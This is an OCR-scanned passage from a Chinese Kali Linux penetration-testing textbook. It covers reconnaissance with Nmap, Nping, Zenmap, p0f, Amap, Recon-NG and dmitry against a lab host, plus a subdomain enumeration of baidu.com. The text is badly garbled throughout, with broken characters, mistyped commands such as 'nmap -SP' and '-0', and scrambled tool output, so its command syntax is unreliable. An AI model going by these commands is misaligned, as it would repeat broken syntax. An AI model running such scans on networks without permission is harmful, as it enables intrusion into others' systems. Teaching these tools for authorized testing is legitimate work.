Nmap 是 一 个 免费 开放 的 网 络 扫 拉 和 哩 探 工 具 包 ， 也 叫 网 络 映 射 器 (Network 
Mapper) 。 该 工具 其 基本 功能 有 三 个 ， 一 是 探测 一 组 主机 是 否 在 线 ; 其 次 是 扫 摘 主 
机 端口 ， 嗅 探 所 提供 的 网 络 服务 ; 三 是 可 以 推断 主机 所 用 的 操作 系统 。 通 常 ， 用 户 
利用 Nmap 来 进行 网 络 系统 安全 的 评估 ， 而 黑客 则 用 于 扫描 网 络 。 例 如 ， 通 过 向 远 
程 主 机 发 送 探 测 数据 包 ， 获 取 主 机 的 响应 ， 并 根据 主机 的 痛 口 开放 情况 得 到 网 络 的 
安全 状态 。 从 中 寻找 存在 漏洞 的 目标 主机 ， 从 而 实施 下 一 步 的 攻击 。 


Nmap 使 用 TCP/IP 协 议 栈 指纹 准确 地 判断 目标 主机 的 操作 系统 类 型 。 首 先 ，Nmap 
通过 对 目标 主机 进行 病 口 反 搞 ， 找 出 有 哪些 闯 口 正在 目标 主机 上 和 监听。 当 侦 测 到 目 
标 主 机 上 有 多 于 一 个 开放 的 TCP 闯 口 、 一 个 天 闭 的 TCP 病 口 和 一 个 天 闭 的 UDP 疹 口 
时 ，Nmap 的 探测 能 力 是 最 好 的 。Nmap 工 具 的 工作 原理 如 表 4-1 所 示 。 


表 4-1 Nmap 工 作 原 理 

测 "A 
iX 描述 
1 发 送 TCP 数 据 包 (Flag=SYN) 到 开放 的 TCP 端 口上 
T2 发 送 一 个 衬 的 TCP 数 据 包 到 开放 的 TCP 疹 口上 


发 送 TCP 数 据 包 (Flag=SYN、URG、PSH 和 FIN) 到 开放 的 TCP 端 口 
ub 


T4 发 送 TCP 数 据 包 (Flag=ACK) 到 开放 的 TCP 端 口上 
T5 发 送 TCP 数 据 包 (Flag=SYN) 到 关闭 的 TCP 端 口上 
T6 发 送 TCP 数 据 包 (Flag=ACK) 到 开放 的 TCP 端 口上 
T7 发 送 TCP 数 据 包 (Flag=URG、PSH 和 FIN) 到 关闭 的 TCP 端 口上 


[ES 


Nmap 对 目标 主机 进行 一 系列 测试 ， 如 表 4-1 所 示 。 利 用 得 出 的 测试 结果 建立 相应 目 
标 主机 的 Nmap 指 纹 。 最 后 ， 将 此 Nmap 指 纹 和 与 指纹 库 中 指纹 进行 查找 匹配 ， 从 而 得 
出 目标 主机 的 操作 系统 类 型 。 


Nmap 主 要 扫 拍 类 型 如 表 4-2 所 示 。 
表 4-2 Nmap 主 要 扫描 类 型 


Ping 扫 描 


TCP SYN 扫 描 
操作 系统 识别 


4.3.2 使 用 Nmap 识 别 活跃 主机 


上 一 小 节 介 绍 了 Nmap 工 具 概 念 及 功能 。 现 在 融 使 用 该 工具 ， 测 试 一 个 网 络 中 活跃 
的 主机 。 使 用 方法 如 下 所 示 。 


使 用 Nmap 坦 看 一 个 主机 是 否 在 线 。 执 行 命令 如 下 所 示 : 


root@kali:~# nmap -SP 192.168.41.136 
Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-21 17:54 CST 
Nmap scan report for www.benet.com (192.168.41.136) 
Host 1S up (0.00028s latency). 
MAC Address: 00:0C:29:31:02:17 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds 


Vm O 42 ff 
UDP} 
cS fk 4a Fa 


从 输出 的 信息 中 可 以 看 到 192.168.41.136 主 机 的 域名 、 主 机 在 线 和 MAC 地 址 等 。 
用 户 也 可 以 使 用 Nping (Nmap 套 具 ) 查看 ， 能 够 获取 更 多 详细 信息 。 执 行 命 全 如 下 


PAAR : 


root@kali:~# nping --echo-client "public" echo.nmap.org 


Starting Nping 
.6030s ) 
.7971s) 
.6047s) 
.6149s ) 
.6289s ) 
. 6322s) 
.6429s) 
. 6435s) 
. 6454s) 
(5: 
Max rtt: 


SENT 
RCVD 
SENT 
RCVD 
SENT 
RCVD 
SENT 
RCVD 
SENT 
RCVD 


6455s) 


0.6.40 ( http://nmap. 
[192.168.41. 
[74.207.244. 
[192.168.41. 
[74.207.244. 
[192.168.41. 
[74.207.244. 
[192.168.41. 
[74.207.244. 
[192.168.41. 
[74.207.244. 
193.736ms | Min rtt: O. 
Raw packets sent: 5 (140B) 


ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 


234 » 
221 
234 
221 
234 
221 
234 
221 
234 
221 > 
042ms 


V V V V V V V V 


| Rcvd: 11 


| Avg rtt: 
(506B) | 


Nping done: 1 IP address pinged in 6.72 seconds 


T 
全 出 的 信息 显示 了 与 echo.nmap.org 网 站 连接 时 数据 的 发 送 情 况 ， 


时 间 、 接 收 时 间 、TTL 值 和 往返 时 间 等 。 
用 户 也 可 以 发 送 一 些 十 六 进 制 数据 到 指定 的 疹 口 ， 如 下 所 示 : 


Echo 
Echo 
Echo 
Echo 
Echo 
Echo 
Echo 
Echo 
221 Echo 
234 Echo 
70.512ms 


221 
234 
221 
234 
221 
234 
221 
234 


Lost: © (O. 


org/nping ) at 2014-04-21 17:5: 
14.207.244. 
192.168.41. 
14.207.244. 
192.168.41. 
14.207.244. 
192.168.41. 
14.207.244. 
192.168.41. 
14.207.244. 
192.168.41. 


request | 
reply (t\ 
request | 
reply (t\ 
request | 
reply (t\ 
request | 
reply (t\ 
request | 
reply (t\ 


00%)| Ect 





如 发 送 数据 包 的 


root@kali:~# nping -tcp -p 445 -data AF56A43D 192.168.41.136 
Starting Nping 0.6.40 ( http://nmap.org/nping ) at 2014-04-21 17:5t 
SENT (0.0605s) TCP 192.168.41.234:14647 » 192.168.41.136:445 S ttl- 
RCVD (0.0610s) TCP 192.168.41.136:445 » 192.168.41.234:14647 RA tt. 
SENT (1.0617s) TCP 192.168.41.234:14647 » 192.168.41.136:445 S ttl- 
RCVD (1.0620s) TCP 192.168.41.136:445 > 192.168.41.234:14647 RA tt. 
SENT (2.0642s) TCP 192.168.41.234:14647 » 192.168.41.136:445 S ttl- 
RCVD (2.0645s) TCP 192.168.41.136:445 » 192.168.41.234:14647 RA tt. 
SENT (3.0667s) TCP 192.168.41.234:14647 » 192.168.41.136:445 S ttl- 
RCVD (3.0675s) TCP 192.168.41.136:445 » 192.168.41.234:14647 RA tt. 
SENT (4.0683s) TCP 192.168.41.234:14647 » 192.168.41.136:445 S ttl- 
RCVD (4.0685s) TCP 192.168.41.136:445 » 192.168.41.234:14647 RA tt. 
Max rtt: 0.334ms | Min rtt: 0.136ms | Avg rtt: 0.217ms 

Raw packets sent: 5 (220B) | Rcvd: 5 (230B) | Lost: 0 (0.0096) 

Nping done: 1 IP address pinged in 4.13 seconds 





输出 的 信息 显示 了 192.168.41.234 与 目标 系统 192.168.41.136 之 间 TCP 传 输 过 程 。 
通过 发 送 数 据 包 到 指定 新 口 模拟 出 一 些 弟 见 的 网 络 层 攻 击 ， 以 验证 目标 系统 对 这 些 
测试 的 防御 情况 。 


4.4 & &il Bm 


对 一 个 大 范围 的 网 络 或 活跃 的 主机 进行 渗透 测试 ， 必 须要 了 解 这 些 主机 上 所 打开 的 
端口 号 。 在 Kali Linux 中 默认 提供 了 Nmap 和 Zenmap 两 个 扫描 端口 工具 。 为 了 访问 
目标 系统 中 打开 的 TCP 和 UDP 户口 ， 本 节 将 介绍 Nmap 和 Zenmap 工 具 的 使 用 。 


4.4.1 TCPimL11318 LE Nmap 


使 用 Nmap 工 具 查 看 目标 主机 192.168.41.136 上 开放 的 端口 号 。 执行 命令 如 下 所 
7. 


root@kali:~# nmap 192.168.41.136 

Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-19 16:21 CST 
Nmap scan report for www.benet.com (192.168.41.136) 

Host 1S up (0.00022s latency). 

Not shown: 996 closed ports 


PORT STATE SERVICE 
21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 
25/tcp opne smtp 

53/tcp open domain 
80/tcp open http 
111/tcp open rpcbind 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
512/tcp open exec 
513/tcp open login 
514/tcp open Shell 
1099/tcp open rmiregistry 
1524/tcp open ingreslock 
2049/tcp open nfs 
2121/tcp open ccproxy-ftp 
3306/tcp open mysql 
5432/tcp open postgresql 
5900/tcp open vnc 
6000/tcp open X11 
6667/tcp open irc 
8009/tcp open ajp13 
8180/tcp open unknown 


MAC Address: 00:0C:29:31:02:17 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds 


a Hd AE E X zn f ENL192.168.41.136 E ARPT Amo, 32H22. 53. 8051111 


=F o 
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如 果 目 标 主 机 上 打开 的 奖 口 较 多 时 ， 用 户 查 看 起 来 可 能 有 点 困难 。 这 时 候 用 户 可 以 
使 用 Nmap 指 定 扫 摘 的 闯 口 范围 ， 如 指定 扫 摘 痕 口 号 在 1 一 1000 之 间 的 闯 口 号 ， 执 
41 fip 43 41 KATH : 


root@kali:~# nmap -p 1-1000 192.168.41.136 

Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-19 16:27 CST 
Nnap scan report for www.benet.com (192.168.41.136) 

Host is up (0.00020s latency). 

Not shown: 49 closed ports 


PORT STATE SERVICE 
21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 
25/tcp opne smtp 

53/tcp open domain 
80/tcp open http 
111/tcp open rpcbind 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
512/tcp open exec 
513/tcp open login 
514/tcp open shell 


MAC Address: 00:0C:29:31:02:17 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds 


输出 的 信息 显示 了 主机 192.168.41.136 上 端口 在 1 一 1000 之 间 所 开放 的 端口 号 。 
2. 43 T REXE S A 
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[实例 4-2】 使 用 Nmap 工 具 指定 扫描 在 192.168.41.* 网 段 内 所 有 开启 TCP 端 口 22 的 
主机 。 执 行 命 分 如 下 所 示 : 


root@kali:~# nmap -p 22 192.168.41.* 


Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-21 09:44 CST 
Nmap scan report for 192.168.41.1 

Host 1S up (0.00029s latency). 

PORT STATE SERVICE 

22/tcp closed ssh 

MAC Address: 00:50:56:C0:00:08 (VMware) 


Nmap scan report for 192.168.41.2 

Host 1S up (0.00032s latency). 

PORT STATE SERVICE 

22/tcp closed ssh 

MAC Address: 00:50:56:E9:AF:47 (VMware) 


Nmap scan report for www.benet.com (192.168.41.136) 
Host is up (0.00056s latency). 

PORT STATE SERVICE 

22/tcp open ssh 

MAC Address: 00:0C:29:31:02:17 (VMware) 


Nmap scan report for 192.168.41.254 
Host is up (0.00027s latency). 

PORT STATE SERVICE 

22/tcp filtered ssh 

MAC Address: 00:50:56:E1:5E:75 (VMware) 


Nnap scan report for 192.168.41.234 
Host is up (0.000052s latency). 
PORT STATE SERVICE 

22/tcp open ssh 


Nmap done: 256 IP addresses (5 hosts up) scanned in 2.81 seconds 


a HHBUAZEZR Y. zn f 192.168.41.* I E PRI F 6 220m MEAS. Mis 
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使 用 Nmap 工 具 还 可 以 指定 扫描 端口 22 结 果 的 输出 格式 。 执 行 命令 如 下 所 示 : 


root@kali:~# nmap -p 22 192.168.41.* -oG /tmp/nmap-targethost -tcp4- 





执行 以 上 命 侈 后 输出 的 信息 与 第 三 步 中 输出 的 结果 类 似 ， 这 里 束 不 再 列举 。 但 是 执 
行 该 命令 后 ，Nmap 会 将 输出 的 信息 保存 到 /tmp/ nmap-targethost-tcp445.txt 文 件 
中 。 


4.4.2 图 形 化 TCP 瘦 口 扫 摘 工具 Zenmap 


Zenmap 是 Nmap 官 方 推出 的 一 款 基 于 Nmap 的 安全 扫描 图 形 用 户 界 面 。 它 的 设计 目 
标 是 快速 地 扫 摘 大 型 网 络 ， 当 然 也 可 以 使 用 它 扫 拍 单 个 主机 。 下 面 将 介绍 Zenmap 
工具 的 使 用 。 


启动 Zenmap 工 具 。 在 Kali 图 形 界面 依次 选择 "应 用 程序 "|Kali Linux| "信息 收集 "| DNS 
分 析 ?"|Zenmap 命 仿 ， 将 打开 如 图 4.2 所 示 的 界面 。 














Zenmap 
Scan Tools Profile Help 
| 


Target Profile: |Intense scan v Scan 


Command: |nmap -T4 -A -v 


Hosts Services 











Nmap Output Ports/Hosts Topology Host Details Scans 


05 Host w 





Filter Hosts 


图 4.2 Zenmap 起 始 界 面 


在 该 界面 Target 文 本 框 中 输入 目标 主机 地 址 ， 在 Profile 文 本 框 中 选择 扫描 类 型 。 设 
置 完 后 ， 单 击 Scan 按 钮 ， 扫 摘 结 果 如 图 4.3 所 示 。 
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Target: 192.168.4].* 
























































Command: [nmap -T4 -A -v 192.168.41.* 








Hosts | services | | Nmap Output Ports / Hosts Topology | Host Details Scans 





























Os Host | nmap -T4 -A -v 192.168.41." A^ | s 
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| - | Discovered open port 53/tcp on 1947, 169.41, 13b 
E 19216841; Discovered open port 135/tcp on 192.168.41.1 
L| 19216841. Discovered open port 443/tcp on 192.168.41.1 
^) www.benetc | Discovered open port B0/tcp on 192, 168.41. 136 
|; | Discovered open port 59800/tcp on 192.168.41.1 
BE 192.168.41 Discovered open port 445/tcp on 192.168.41.1 
“| 19216841. | Discovered open port 6059/tcp on 192.168.41.1 
Completed SYM Stealth Scan against 192.168.41.136 
in 0.17s (3 hosts left) 
Discovered open port 912/tcp on 192.168.41.1 
Discovered open port 49160/tcp on 192.168.41.1 
Discovered open port 902/tcp on 192.168.41.1 
Discovered open port 49153/tcp on 192.168.41.1 
Discovered open port 49155/tcp on 192.168.41.1 
CEM >) |Discovered open port 24800/tcp on 192.168.41.1 
| | Discovered open port 49152/tcp on 192.168.41.1 


Filter Hosts FALLI" sbsdi "ARE Fal < 有 二 ("LLL 2-foca AAA arD AS C402 








图 4.3 扫描 界面 





Profile: ‘Intense scan | | Scan | | Cancel. 





ARAB Ea 1218192.168.41.*DJ EZ JF ELS S5 BAJA mAAR. EEA 
可 以 切换 以 主机 或 服务 的 形 陈 分 别 显示 详细 扫 摘 结果 。 在 石 侧 栏 中 ， 可 以 分 别 查看 


Namp 输 出 信息 、 闯 口 /主机 、 拓 扑 结构 、 主 机 详细 信息 和 扫 朱 信息 等 。 
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4. 5 RTH? ZLIR A 


现在 一 些 便携 式 计 算 机 操作 系统 使 用 指纹 识别 来 验证 密码 进行 登录 。 指 纹 识别 是 识 
别 系 统 的 一 个 典型 模式 ， 钙 括 指 纹 图 像 获取 、 人 处 理 、 特 征 提 取 和 对 等 模块 。 如 果 要 
做 渗透 测试 ， 需 要 了 解 要 渗透 测试 的 操作 系统 的 类 型 才 可 以 。 本 节 将 介绍 使 用 
Nmap 工 具 测 试 正在 运行 的 主机 的 操作 系统 。 


4.5.1 使 用 Nmap 工 具 识 别 系 统 指纹 信息 
使 用 Nmap 命 邻 的 -O 选 项 启用 操作 系统 测试 功能 。 执 行 命 分 如 下 所 示 : 


root@kali:~# nmap -0 192.168.41.136 

Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-19 19:20 CST 
Nmap scan report for www.benet.com (192.168.41.136) 

Host is up (0.00045s latency). 

Not shown: 996 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

53/tcp open domain 

80/tcp open http 

111/tcp open rpcbind 

MAC Address: 00:0C:29:31:02:17 (VMware) //MAC 地 址 

Device type: general purpose 

Running: Linux 2.6.X|3.X 

OS CPE: cpe:/o:linux:linux kernel:2.6 cpe:/o: linux: linux_kernel:3 
OS details: Linux 2.6.32 - 3.9 

Network Distance: 1 hop 


OS detection performed. Please report any incorrect results at htty 
Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds 


a] | 2 





傅 出 的 信息 显示 了 主机 192. 168.41. 136 的 指纹 信息 ， 包括 目标 主机 打开 的 痕 口 、 
MAC 地 址 、 操 作 系 统 类 型 和 内 核 版 本 等 。 


4.5.2 指纹 识别 工具 pof 


p0f 是 一 款 百 分 之 百 的 被 动 指纹 识别 工具 。 该 工具 通过 分 析 目 标 主机 发 出 的 数据 名， 
对 主机 上 的 操作 系统 进行 鉴别 ， rnan & 3 VE BE E FAY 5 925 3 is] 
中 页 o p0f 主 要 识别 别 的 信息 /EN 如 下 : 


操作 系统 类 型 ; 
Vin ; 
AE RTT Adae ira 


是 否 运行 于 负载 均衡 模式 ; 


e 远程 系统 已 启动 时 间 ; 
e 远程 系统 的 DSL 和 ISP 信 息 等 。 


使 用 p0f 分 析 Wireshark 捕 获 的 一 个 文件 。 执 行 命令 如 下 所 示 : 


root@kali:~# pOf -r /tmp/targethost.pcap -o pOf-result.log 

--- pof 3.06b by Michal Zalewski <lcamtuf@coredump.cx=> --- 
[+] Closed 1 file descriptor. 

[+] Loaded 314 signatures from 'pOf.fp'. 

[+] Will read pcap data from file '/tmp/targethost.pcap'. 

[+] Default packet filtering configured [+VLAN]. 

[+] Log file 'pOf-result.log' opened for writing. 

[+] Processing capture data. 

-[ 192.168.41.234/55653 -> 192.168.41.141/80 (syn) ]- 

| 


| client = 182.168.41.234/55653 

| os - Linux 2.2.x-3.x 

| dist =0 

| params = generic 

| raw_sig = 4:64+0:0:1460:mss*20,10:mss,sok,ts,nop,ws:dfid+:0 


.-[ 192.168.41.234/55653 -> 192.168.41.141/80 (mtu) ]- 
| 


| client = 192.168.41.234/55653 
| link = Ethernet or modem 
| raw mtu - 1500 


h 


.-[ 192.168.41.234/55653 -> 192.168.41.141/80 (syn+ack) }- 
| 


| server = 192.168.41.141/80 

| os - Linux 3.x 

| dist =0 

| params = none 

| raw_sig = 4:64+0:0:1460:mss*10,6:mss,sok,ts,nop,ws:df:0 


.-[ 192.168.41.234/55653 -> 192.168.41.141/80 (mtu) ]- 
| 


| server = 192.168.41.141/80 
| link = Ethernet or modem 
| raw mtu = 1500 


o- m = = 


.-[192.168.41.234/55653 -> 192.168.41.141/80 (http request) ]- 
| 


| client 192.168.41.234/55653 
| app - Firefox 10.x or newer 
| lang - English 
| params - none 
raw sig - 


| :Host,User-Agent,Accept=[text/html,application/xhtml+xml,application/xml:q= 0.9,*/*;qg=0.8], Acce 
pt-Language-[en-US,en;qz0.5], Accept-Encoding=[gzip,deflate],Connection=[keep-alive]:Accept- 

Charset,Keep-Alive:Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 
Iceweasel/22.0 

| 

.-[ 192.168.41.234/55653 -> 192.168.41.141/80 (http response) ]- 

| 


| server - 192.168.41.141/80 

| app = Apache 2.x 

| lang = none 

| params - none 

| raw sig - 


1:Date, Server, Accept-Ranges-[bytes], ? Content-Length,Connectionz[close], Content-T ype:Keep- 
Alive: Apache/2.2.15 (Red Hat) 
| 


Aer Processed /18 packets. 

ia tH BS E ze pOf A rtargethost.pcapel Bg— NR. BAERS ES Pm Bs 
器 的 详细 信息 ， 包 括 操 作 系 统 类 型 、 地 址 、 以 太 网 模式 、 运 行 的 服务 器 和 端口 号 
Fo 


k : pO0f 命 全 的 V2 和 v3 版 中 所 使 用 的 选项 有 很 大 的 差别 。 例 如 ， 在 pOfv2 有 版 
本 中 ， 指 定 文 件 使 用 的 选项 是 -s$， 但 是 在 v3 版 本 中 是 -[r。 本 书 中 使 用 的 p0f 有 版 本 是 


V3。 


4.6 服务 的 指纹 识 马 


为 了 傅 保 有 一 个 成 功 的 渗透 测试 ， 必 须 需 要 知道 目标 系统 中 服务 的 指纹 信息 。 服 务 
指纹 信息 包括 服务 痕 口 、 Vee 在 Kali 中 ， 可 以 使 用 Nmap 和 Amap 工 具 
识别 指纹 信息 。 本 节 将 介绍 使 用 Nmap 和 Amap 工 具 的 使 用 。 


4.6.1 使 用 Nmap 工 具 识 别 服务 指纹 信息 
使 用 Nmap 工 具 查 看 192.168.41.136 服 务 上 正在 运行 的 端口 。 执 行 命 令 如 下 所 示 : 


root@kali:~# nmap -sV 192.168.41.136 


starting Nmap 6.40 ( http://nmap.org ) at 2014-04-21 10:56 CST 
Nmap scan report for www. benet com (192.168.417.136) 

Host is up (0.00020s latency). 

Not shown: 995 closed ports 


PORT STATE SERVICE VERSION 
21/tcp open ftp vsftpd 2.2.2 
22cp openssh OpenSsH 5.3 (protocol 2.0) 
o3/tcp open domain 

8ü/tcp openhttp Apache httpd 2.2.15 ((Red Hat)) 
111/tcp openrpcbind 2-4 (RPC #100000) 


MAC Address: 00:0C:29:31:02:17 (VMware) 

service Info: OS: Unix 

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 11.50 seconds 


从 输 出 的 信息 中 可 以 查看 至 目标 服务 器 上 运行 的 新 口号 有 21、22、53、80 和 111。 
lay, se RANA T m Lt ARS Rika. 


4.6.2 服务 枚 举 工 具 Amap 


Amap 是 一 个 服务 枚 举 工 具 。 使 用 该 工具 能 识别 正 运行 在 一 个 指定 闯 口 或 一 个 泄 围 
端口 上 的 应 用 程序 。 下 面 使 用 Amap 工 具 在 指定 的 50 一 100 端 口 范 围 内 ， ik Bae 
机 192.168.41.136 上 正在 运行 的 应 用 程序 。 执 行 命 分 如 下 所 示 : 


root@kali:~# amap -bq 192.168.41.136 50-100 

amap v5.4 (www.thc.org/thc-amap) started at 2014-04-21 11:20:36 - / 
Protocol on 192.168.41.136:80/tcp matches http - banner: «!DOCTYPE 
Protocol on 192.168.41.136:80/tcp matches http-apache-2 - banner: 
Protocol on 192.168.41.136:53/tcp matches dns - banner: \f 

amap v5.4 finished at 2014-04-21 11:20:48 


a] : Bea aaa A A E A aaa uaa eee E 


输出 的 信息 显示 了 192.168.41.136 主 机 在 50 一 100 闯 口 溯 围 内 正在 运行 的 端口 。 从 
^ 出 结果 的 第 二 段 内 容 中 可 以 了 解 到 主机 192.168.41.136 使 用 的 是 Red Hat 操 作 系 
统 ， 并 且 正 在 运行 着 版 本 为 2.2.15 的 Apache 服 务 器 ， 其 开放 的 端口 是 80。 从 倒数 第 
二 行 信 息 中 可 以 看 到 该 主机 还 运行 了 DNS 服务 器 ， 其 开放 的 端口 是 53。 





4.7 其 他 信 县 收集 手段 


上 面 介 绍 了 使 用 不 同 的 工具 以 操作 步骤 的 形式 进行 了 信息 收集 。 在 Kali 中 还 可 以 使 
用 一 些 常 规 的 或 非常 规 方法 来 收集 信息 ， 如 使 用 Recon-NG 框 架 、Netdiscover 工 具 
和 Shodan 工 具 等 。 本 节 将 介绍 使 用 这 些 方法 ， 实 现 信息 收集 。 


4.7.1 Recon-NG 框 架 


Recon-NG 是 由 Python 编写 的 一 个 开源 的 Web 侦 查 (信息 收集 ) 框架 。Recon-NG 
框架 是 一 个 强大 的 工具 ， 使 用 它 可 以 自动 的 收集 信息 和 网 络 侦 查 。 下 面 将 介绍 使 用 
Recon-NG4i & L E, 


启动 Recon-NG 框 染 。 执 行 命 分 如 下 所 示 : 
root@kali:~# recon-ng 
SES SES By ay Sit — Ey 1 / / SS ES SS 
7 | 


3 | 4d f Li | E 3 ees ae 
Tian gs RT g E Gr HORE TORT AST 8 jer vf EY ERR REY Dieu ENT ITIN 
pou 7) up up SEE | 
SE poke Sek Se ag A J T 
中 em a E EEn 中 
e ce <= | 
M ES | sce Lege DA 3 rise sui reos EI VN cee meee NENNT | 
HOWICK a LLIN OUCH CIV 


Consulting | Research | Development | Training | 
http//www. Sess dis cus com | 


[recon-ng v4.1.4, Tim Tomes (GLaNMaSteR53)] 
[56] Recon modules 
[5] Reporting modules 
[2] Exploitation modules 
[2] Discovery modules 
[1] Import modules 
[recon-ng][default] > 


以 上 输出 信息 显示 了 Recon-NG 框 架 BY ZEAE o 例如 ， 在 Recon-NG 框 架 下 ， 包 
插 56 个 侦查 模块 、5 个 报告 模块 、2 个 渗透 攻击 模块 、2 个 发 现 模 块 和 1 个 导 人 模块 。 


看 到 [recon-ngjl[defaultj> 提 示 符 ， JURBUDE 2 Recon NG 框架 。 现在 ， 就 可 以 在 
[recon-ng][default] > 提示 符 后 面 执 行 各 种 操作 命 分 了 。 


首次 使 用 Recon-NG 框 架 之 前 ， 可 以 使 用 help 命 邻 查看 所 有 可 执行 的 命 舍 。 如 下 所 
/小 : 


[recon-ng][default] > help 
Commands (type [help|?] <topic>): 


add Adds records to the database 

back Exits current prompt level 

del Deletes records from the database 
exit Exits current prompt level 

help Displays this menu 

keys Manages framework API keys 

load Loads specified module 

pdb Starts a Python Debugger session 
query Queries the database 

record Records commands to a resource file 
reload Reloads all modules 

resource Executes commands from a resource file 
search Searches available modules 

set Sets module options 

Shell Executes shell commands 

show Shows various framework items 

spool Spools output to a file 

unset Unsets module options 

use Loads specified module 


workspaces Manages workspaces 


VA E48 H8 A zs f f£Recon-NGTE2R R n] ITD. HEA AMetasploitt#EA K 
似 ， 同 样 也 支持 很 多 模块 。 此 时 ， 可 以 使 用 show modules 命 分 查看 所 有 有 效 的 模块 
列表 。 执行 命令 如 下 所 示 : 


[recon-ng]|[default| > show modules 

Discovery 
discovery/info disclosure/cache snoop 
discovery/info disclosure/interesting files 
Exploitation 
exploitation/injection/command injector 
exploitation/injection/xpath bruter 

Import 


Recon 

recon/companies-contacts/facebook 
recon/companies-contacts/jigsaw 
recon/companies-contacts/jigsaw/point usage 
recon/companies-contacts/jigsaw/purchase contact 
recon/companies-contacts/jigsaw/search contacts 
recon/companies-contacts/linkedin auth 
recon/contacts-contacts/mangle 
recon/contacts-contacts/namechk 
recon/contacts-contacts/rapportive 
recon/contacts-creds/haveibeenpwned 
recon/hosts-hosts/bing ip 
recon/hosts-hosts/ip neighbor 
recon/hosts-hosts/ipinfodb 
recon/hosts-hosts/resolve 
recon/hosts-hosts/reverse_resolve 
recon/locations-locations/geocode 
recon/locations-locations/reverse geocode 
recon/locations-pushpins/flickr 
recon/locations-pushpins/picasa 
recon/locations-pushpins/shodan 
recon/locations-pushpins/twitter 
recon/locations-pushpins/youtube 
recon/netblocks-hosts/reverse resolve 
recon/netblocks-hosts/shodan net 
recon/netblocks-ports/census 2012 

Reporting 

reporting/csv 

reporting/html 

reporting/list 

reporting/pushpin 

reporting/xml 

[recon-ng] [default] > 


从 输出 的 信息 中 ， 可 以 看 到 显示 了 五 部 分 。 每 部 分 包括 的 模块 数 ， 在 启动 Recon- 
NG 框架 后 可 以 看 到 。 用 户 可 以 使 用 不 同 的 模块 进行 各 种 的 信息 收集 。 下 面 以 例子 
的 形式 介绍 使 用 Recon-NG 中 的 模块 进行 信息 收集 。 


【实例 4-3】 使 用 recon/domains-hosts/baidu_site 模 块 ， 枚 举 baidu 网 站 的 子 域 。 具 
体操 作 步 又 如 下 所 示 。 


(1) 使 用 recon/domains-hosts/baidu _ site 模块 。 执 行 命令 如 下 所 示 : 


[recon-ng][default] > use recon/domains-hosts/baidu site 


(2) & €i XC FUB AES Dim Hm : 


[recon-ng][default][baidu site] > show options 
Name Current Value Req Description 


SOU RCE default yes source of input (see 'show info' for details) 
[recon-ng][default][baidu, site] > 


从 输出 的 信息 中 ， 可 以 看 到 有 一 个 选项 需要 配置 。 
(3) 配置 SOURCE 选 项 参数 。 执 行 命 分 如 下 所 示 : 


[recon-ng][default][baidu site] > set SOURCE baidu.com 
SOURCE => baidu.com 


从 输出 的 信息 中 ， 可 以 看 到 SOURCE 选 项 参数 已 经 设置 为 baidu.com。 
(4) 和 启动 信息 收集 。 执 行 命令 如 下 所 示 : 


[recon-ng]|[default][baidu site] > run 


[*] URL: http://www.baidu.com/s?pn=0&wd=site%3Abaidu.com 
[*] map.baidu.com 

[*] 123.baidu.com 

[*] jingyan.baidu.com 

[*] top.baidu.com 

[*] www.baidu.com 

[*] hi.baidu.com 

[*] video.baidu.com 

[*] pan.baidu.com 

[*] zhidao.baidu.com 

[*] Sleeping to avoid lockout.. 


[*] 9 total (2 new) items found. 


从 输出 的 信息 中 ， 可 以 看 到 找到 了 9 个 子 域 。 枚 举 到 的 所 有 数据 将 被 连接 到 Recon- 
NG 放置 的 数据 库 中 。 这 时 候 ， 用 户 可 以 创建 一 个 报告 查看 被 连接 的 数据 。 


[实例 4-4】 查看 获取 的 数据 。 具 体操 作 步 又 如 下 所 示 。 
(1) 选择 reporting/csv 模 块 ， 执 行 合 分 如 下 所 示 。 


[recon-ng|[default] > use reporting/csv 


(2) 生成 报告 。 执 行 合 分 如 下 所 示 : 


[recon-ng|[default][csv] > run 
[^] 9 records added to '/root/.recon-ng/workspaces/default/results 


LNNi^SS9))))J)J9.999J99J O 





从 输出 的 信息 中 可 以 看 到 ， 枚 举 到 的 9 个 记录 已 被 添加 到 /root/.recon-ng 
/workspacesjdefaultresults csv 文 件 中 。 打 开 该 文件 ， 如 图 4.4 所 示 。 


























results.csv " = 


文件 (F) 编辑 E) 搜索 (5) 选项 (0) 帮助 (H) 
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图 4.4 results.csv X ftt 
(3) 从 该 界面 可 以 看 到 ， 枚 举 到 的 所 有 子 域 。 
用 户 也 可 以 使 用 Dmitry 命 爷 ， 查 询 关 于 网 站 的 信息 。 下 面料 介绍 Dmitry 命 命 的 使 


Oo 


查看 Dmitry 命 令 的 帮助 信息 。 执 行 命令 如 下 所 示 : 


root@kali:~# dmitry -h 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 
dmitry: invalid option -- 'h' 
Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host 
-0 Save output to %host.txt or to file specified by -o file 
-i Perform a whois lookup on the IP address of a host 
-w Perform a whois lookup on the domain name of a host 
-n Retrieve Netcraft.com information on a host 
-S Perform a search for possible subdomains 
-e Perform a search for possible email addresses 
-p Perform a TCP port scan on a host 
* -f Perform a TCP port scan on a host showing output reporting fi. 
* -b Read in the banner received from the scanned port 
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 
*Requires the -p flagged to be passed 


OOOO SESS aaa 


以 上 信息 显示 了 dmitry 命 命 的 语法 格式 和 所 有 可 用 参数 。 下 面 使 用 dmitry 命 全 的 -s 选 
